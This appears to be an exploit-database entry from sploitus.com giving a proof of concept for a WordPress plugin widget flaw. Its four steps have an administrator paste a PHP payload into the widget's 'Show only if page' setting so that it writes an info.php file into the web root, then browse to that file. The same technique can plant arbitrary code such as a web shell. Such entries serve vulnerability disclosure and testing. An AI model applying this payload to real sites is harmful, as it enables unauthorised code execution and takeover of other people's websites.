## https://sploitus.com/exploit?id=WPEX-ID:0D6B46CB-5244-486F-AD70-4023907AC9EB
- Add the Widget of the plugin (e.g via /wp-admin/widgets.php)
- Put the following payload (replacing WEBROOT by the real value) in the "Show only if page" setting of the widget: file_put_contents('/WEBROOT/info.php', '<?php phpinfo(); ?>').
- Save the settings and click on the Update button in the Widgets page
- Then go to /info.php (or whatever path was set above) to access the created info.php